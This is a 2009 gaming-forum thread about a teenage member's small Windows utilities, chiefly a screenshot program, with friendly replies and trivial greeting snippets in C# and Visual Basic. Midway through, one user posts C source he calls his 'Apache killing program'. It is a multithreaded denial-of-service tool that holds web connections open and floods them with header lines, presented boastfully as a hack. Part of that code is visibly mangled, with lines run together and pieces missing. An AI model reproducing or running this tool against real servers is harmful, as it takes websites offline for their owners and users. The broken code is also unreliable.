MNS - Creations Programs

Shows up Information about our programs

User avatar
Maks12
MM2X Junior User
MM2X Junior User
Posts: 70
Registered for: 17 years 3 months
Location: Germany - Berlin
Contact:

MNS - Creations Programs

Postby Maks12 » Sun May 17, 2009 9:34 pm

Hi
Here we want show you our program projects. :)

We have already released two little programs. The MM2 Register Tool and the MM2 Lock Deleter.

But now we have finished another program the Screenshooter .NET.
It allows you to take shoots from your screen and it will save them automatic to 4 formats: BMP, JPEG, PNG, GIF .

Heres one Screenshot (taken with the Screenshoter .NET ;) :D ):

https://mns-creations.gta-nightlife.de/img/pict0.jpg

Can you please post your opinions ? :)
[url=https://mns-creations.gta-nightlife.de/index.php?style=2][img]https://mns-creations.gta-nightlife.de/img/partner/MNS-Creations_logo_2.gif[/img][/url]

User avatar
Franch88
MM2X Admin
MM2X Admin
Posts: 15758
Registered for: 16 years 10 months
Location: Italy
Been thanked: 1 time
Contact:
Italy

Postby Franch88 » Sun May 17, 2009 10:09 pm

You've made nice programs, great work. :) I like especially the latest one, the Screenshoter.NET, because is possible to save .jpg screenshots with the maximum quality, unlike Fraps. Soon at MM2X. :wink:
Nice tool the MM2 Register Tool, useful for not installed copies of MM2. The MM2 Lock Deleter isn't so useful for me, because the Maxoff's program MM2 Game Loader definitely solves the mm2.lock file problem, and not only that one. However, is better than another more old similar one. :wink:
Fiat 500 = Italian motorization. Franch88, MM2 eXtreme forum and website Administrator.
|Franch88's MM2 Releases|

User avatar
Silent1Unknown
MM2X Super Active User
MM2X Super Active User
Posts: 2472
Registered for: 15 years 11 months
Location: Canada
Contact:

Postby Silent1Unknown » Tue May 19, 2009 4:56 am

Nice program. As Franch said, it has the advantage over Fraps in that it can take HQ jpeg pics. Now I may not have to open Photoshop everytime to preserve the quality. :wink:

Question: Is this specific for games, just MM2, just desktop or anything at all?

Image BEST MM2 SCREENSHOOTER | BEST PHOTOSHOPPER
Image MOST FRIENDLY MEMBER | BEST MM2 WEBSITE

Image

User avatar
Maks12
MM2X Junior User
MM2X Junior User
Posts: 70
Registered for: 17 years 3 months
Location: Germany - Berlin
Contact:

Postby Maks12 » Tue May 19, 2009 4:58 pm

You can save all screenshots you want, for games, for tutorials or anything else ;)
[url=https://mns-creations.gta-nightlife.de/index.php?style=2][img]https://mns-creations.gta-nightlife.de/img/partner/MNS-Creations_logo_2.gif[/img][/url]

User avatar
Maks12
MM2X Junior User
MM2X Junior User
Posts: 70
Registered for: 17 years 3 months
Location: Germany - Berlin
Contact:

Postby Maks12 » Wed May 20, 2009 4:17 pm

sry for doublepost
but when franch released the program, it would be nice when you can post ideas to complete the programs with new features, functions or other.
that would be nice. :afirmar: :)
[url=https://mns-creations.gta-nightlife.de/index.php?style=2][img]https://mns-creations.gta-nightlife.de/img/partner/MNS-Creations_logo_2.gif[/img][/url]

User avatar
Tonywolfe121
MM2X Active User
MM2X Active User
Posts: 502
Registered for: 16 years 9 months

Postby Tonywolfe121 » Wed May 20, 2009 5:10 pm

You should try playing around with the code one topic below you :wink:

ps. What .NET launage are you into personaly my favorite is c#

User avatar
Maks12
MM2X Junior User
MM2X Junior User
Posts: 70
Registered for: 17 years 3 months
Location: Germany - Berlin
Contact:

Postby Maks12 » Wed May 20, 2009 6:04 pm

I use Visual Basic.
It's easy but effectly ;) ^^

and i have already downloaded the decompiled exe ;)
but it's difficult to appreciate the code without knowing about the c++ language.
[url=https://mns-creations.gta-nightlife.de/index.php?style=2][img]https://mns-creations.gta-nightlife.de/img/partner/MNS-Creations_logo_2.gif[/img][/url]

User avatar
kylej866
MM2X Occasional User
MM2X Occasional User
Posts: 388
Registered for: 15 years 11 months
Location: West Virginia, US
Contact:

Postby kylej866 » Wed May 20, 2009 10:24 pm

Lolz VB is a skiddie language :P. I learned Vb in 7th grade :D

C++ ftw :)
[url=https://biohazardgaming.net/kylejdesign/][img]https://i50.tinypic.com/bgz8nl.jpg[/img][/url]

User avatar
Maks12
MM2X Junior User
MM2X Junior User
Posts: 70
Registered for: 17 years 3 months
Location: Germany - Berlin
Contact:

Postby Maks12 » Wed May 20, 2009 10:36 pm

For me its ok you must think of that im only 14 years old ;)

but also if i would be older i think not thats a kiddie language. you can do nearly exact the same like in c# .

i know c++ is a little enhanced, but for my purposes vb is fully sufficient ;)
[url=https://mns-creations.gta-nightlife.de/index.php?style=2][img]https://mns-creations.gta-nightlife.de/img/partner/MNS-Creations_logo_2.gif[/img][/url]

User avatar
Tonywolfe121
MM2X Active User
MM2X Active User
Posts: 502
Registered for: 16 years 9 months

Postby Tonywolfe121 » Thu May 21, 2009 8:09 pm

Im 14 also :D

Cough

Code: Select all

using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; namespace WindowsFormsApplication1 { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { //Lets greet him! MessageBox.Show(Hi Maks12!); // hmm now what? //Meh lets end this xD } } }

User avatar
Maks12
MM2X Junior User
MM2X Junior User
Posts: 70
Registered for: 17 years 3 months
Location: Germany - Berlin
Contact:

Postby Maks12 » Fri May 22, 2009 4:35 am

OK when you post code i will also post code :D

Code: Select all

Module Module1 'This is a console Sub Main() 'OK so Let's greet tonywolfe121 'shows up a MessageBox with the text 'Hi tonywolfe121 :D', with the information icon and the information sound of windows, with the title 'Greetings' MsgBox("Hi tonywolfe121 :D", MsgBoxStyle.Information, "Greetings") 'now the application will close End Sub End Module
[url=https://mns-creations.gta-nightlife.de/index.php?style=2][img]https://mns-creations.gta-nightlife.de/img/partner/MNS-Creations_logo_2.gif[/img][/url]

User avatar
kylej866
MM2X Occasional User
MM2X Occasional User
Posts: 388
Registered for: 15 years 11 months
Location: West Virginia, US
Contact:

Postby kylej866 » Fri May 22, 2009 1:21 pm

Code: Select all

#include "stdafx.h" #include "winsock.h" #include "string.h" #include "stdio.h" #include "windows.h" #pragma comment(lib,"ws2_32") DWORD WINAPI attack(LPVOID); char target[256]; int main(int argc, char* argv[]) { int l=0; int j; DWORD dw; HANDLE hd; if(argc<2) { printf("usage: %s target", argv[0]); exit(0); } strncpy(target, argv[1], 256); printf("Attaching %s ...\n", target); for(j=0;j<50;j++) hd=CreateThread(NULL,0, attack, (LPVOID) l , 0, &dw); for(j=0;j<50>h_addr, host->h_length ); sck.sin_port = htons(80); if((s=socket(AF_INET,SOCK_STREAM,0))==-1) { printf("Socket couldn't be initiallized"); return -1; } if((connect(s,(struct sockaddr *)&sck,sizeof(sck)))) { printf("Couldn't connect"); return -1; } sprintf(buff, "GET / HTTP/1.0\n"); //printf("%s",buff); int len=strlen(buff); if((send(s,buff,len,0))==-1) { printf ("send error"); closesocket(s); return -1; } for(i=0;i<9999;i++) { if((send(s,space,strlen(space),0))==-1) { printf("Send Error on header number %d", i); closesocket(s); return -1; } } closesocket(s); return 0; }
My Apache killing program. Hax ftw :) :twisted:
[url=https://biohazardgaming.net/kylejdesign/][img]https://i50.tinypic.com/bgz8nl.jpg[/img][/url]

User avatar
dageek
MM2X Very Active User
MM2X Very Active User
Posts: 1205
Registered for: 15 years 8 months
Location: United States
Contact:

Postby dageek » Sat May 23, 2009 4:00 am

Holy...
XD
[url=https://www.dageek.webs.com][img]https://i945.photobucket.com/albums/ad294/photobukcet_dageek/Avatars/LamboSig.jpg[/img][/url]

User avatar
Maks12
MM2X Junior User
MM2X Junior User
Posts: 70
Registered for: 17 years 3 months
Location: Germany - Berlin
Contact:

Postby Maks12 » Sat May 23, 2009 5:18 pm

wow :D
not bad ;) ^^

I'm now installing visual studio 10 beta 1.
let's see what microsoft has changed.
i hope it will have a new ribbon bar control. ^^
but i think no.

so please on topic :D

Franch what do you think when do you release it here ?
[url=https://mns-creations.gta-nightlife.de/index.php?style=2][img]https://mns-creations.gta-nightlife.de/img/partner/MNS-Creations_logo_2.gif[/img][/url]

User avatar
Franch88
MM2X Admin
MM2X Admin
Posts: 15758
Registered for: 16 years 10 months
Location: Italy
Been thanked: 1 time
Contact:
Italy

Postby Franch88 » Sat May 23, 2009 10:47 pm

The Screenshoter.NET program is now available at MM2X here. There's no news at the home page because this isn't a program directly related with MM2.
For me this program is perfect how it is, no improvements needed. :) It's immediate and simple to use for the function for which it has been developed.

Good luck with your next ones, if you find interesting ideas. :wink:
Fiat 500 = Italian motorization. Franch88, MM2 eXtreme forum and website Administrator.
|Franch88's MM2 Releases|